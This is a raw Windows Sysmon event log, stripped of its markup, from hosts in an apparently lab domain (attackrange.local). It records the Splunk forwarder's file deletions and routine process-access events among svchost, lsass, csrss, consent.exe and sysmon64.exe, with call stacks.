Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B45C9602FD2C318A0AFCFAA01D2FD416,SHA256=B6EE0C8CCA9C714FEEF0E3A4A4D6FF3AAE771C82DE512DA022736A70C3B635F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053853Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:39.960{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=24A241B20B2D179E219A82528A6495F0,SHA256=F4EA25498A178608A280E0792961155EFFDFEDA478874B8D28B55D35CF6CD899,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053852Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:39.444{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D696B93D45676BFB2B8AE6828BF1CC2D,SHA256=5C1E6C9527C8209ADA939A226DEF4ECA50B18F299206E07779E8900A548762F0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053851Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:39.422{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053850Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:39.422{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053849Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:39.391{466BC892-32D3-60E8-6F0B-00000000CF01}70762764C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+36f20|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+32f80|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+22534|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\SharedStartModel.dll+77f37|C:\Windows\System32\SharedStartModel.dll+b2d9d|C:\Windows\System32\SharedStartModel.dll+b2a24|C:\Windows\System32\SharedStartModel.dll+b2fab|C:\Windows\system32\windows.cortana.Desktop.dll+a274|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f 10341000x80000000000000001053848Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:39.391{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053847Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:39.391{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053846Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:39.391{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053845Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:39.391{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053844Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:39.391{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053843Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:39.391{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053842Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:39.360{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+cdc7|C:\Windows\system32\windows.cortana.Desktop.dll+aedd|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053841Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:39.360{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+ae11|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 23542300x8000000000000000810020Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:40.886{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E5EBFBE0DFFA72F6BC849598BA7FD62,SHA256=C96200E007273A3AB6ABCBB92B9F058E87421425AA372C0C331F7AF44060A552,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053903Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.910{466BC892-02AF-60E8-1300-00000000CF01}976948C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x100040C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+63c9|c:\windows\system32\cryptsvc.dll+62d1|c:\windows\system32\cryptsvc.dll+5e56|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053902Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.796{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053901Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.781{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053900Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.781{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053899Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.781{466BC892-F7D4-60EB-D97D-00000000CF01}9188396C:\Windows\System32\consent.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x70C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\consent.exe+1452|C:\Windows\System32\consent.exe+3ca7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053898Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.765{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC9D132D802C0EF51042191C1688C0E9,SHA256=D855EEF958F8E76394B14AF2DB2C4F66738E6C8B2D1D083C73250EAB198DE5A7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053897Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.765{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053896Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.765{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053895Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.681{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053894Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.681{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053893Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.663{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053892Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.663{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053891Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.663{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053890Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 